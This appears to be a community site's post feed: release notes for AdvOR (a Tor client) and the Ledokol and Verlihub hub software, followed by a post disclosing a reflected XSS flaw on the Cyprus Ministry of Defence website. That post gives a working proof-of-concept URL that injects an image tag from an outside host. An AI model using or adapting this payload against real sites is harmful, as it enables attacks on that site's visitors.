AdvOR 0.3.0.26

Changes in 0.3.0.26
- geoip_c.h was updated with GeoIPCountryWhois.csv released on October 31'st; there are 146784 IP ranges having 31 ranges in the fake "A1" country; all 31 ranges were approximated to real countries
- updated directory authorities according to https://atlas.torproject.org/#search/flag:Authority

File information: AdvOR 0.3.0.26
Posted by advor on 2016-11-06 15:390 comments2 likes

AdvOR 0.3.0.25

Changes in 0.3.0.25
- the OpenSSL library was updated to openssl-1.0.2j
- geoip_c.h was updated with GeoIPCountryWhois.csv released on October 4'th; there are 145708 IP ranges having 31 ranges in the fake "A1" country; all 31 ranges were approximated to real countries

File information: AdvOR 0.3.0.25
Posted by advor on 2016-10-14 14:480 comments2 likes

Ledokol 2.9.0.22

Changes in 2.9.0.22
[ 17] Fixed: Tag parser with lowercase version identifier, report by Uhlik
[ 20] Fixed: Bypass ban notification on old Verlihub to avoid error due to missing arguments, report by Mank
[ 21] Fixed: Welcome messages not being added with MySQL server version 5.7 and above, report by Men_VAf, S0RiN and Tzaca
[ 22] Fixed: New ALTER TABLE syntax since MySQL version 5.7, thanks to Frog
[ 18] Added: respskiplast configuration to skip last used chat responder, request by Uhlik
[ 18] Added: resplist command now accepts optional search pattern, request by Uhlik
[ 19] Added: history, myhistory and ophistory commands lines parameter is now optional and defaults to histdeflines configuration, request by Mank

File information: Ledokol 2.9.0.22
Posted by ledokol on 2016-08-31 13:370 comments2 likes

Verlihub 1.0.1.15

Changes in 1.0.1.15
Commit log: https://github.com/verlihub/verlihub/commits/master

File information: Verlihub 1.0.1.15
Posted by verlihub on 2016-08-31 13:100 comments2 likes

Ministry of Defence Republic of Cyprus - XSS

Vulnerable page: http://www.mod.gov.cy/mod/mod.nsf/AdvancedSearch_en/AdvancedSearch_en?OpenForm

PoC
http://www.mod.gov.cy/mod/mod.nsf/AdvancedSearch_en/AdvancedSearch_en?OpenForm&q=&p=1&w=&t=&s="><img%20src=http://www.te-home.net/gallery/xssd_by_teamelite.png>



It is enough to insert any XSS code directly into search form and your code will be executed and displayed immediately.

Note: This is a proof of concept and it doesn't reflect the views or interests of above website.
Posted by Neo on 2016-08-23 21:330 comments2 likes
« Back • 1 • Next »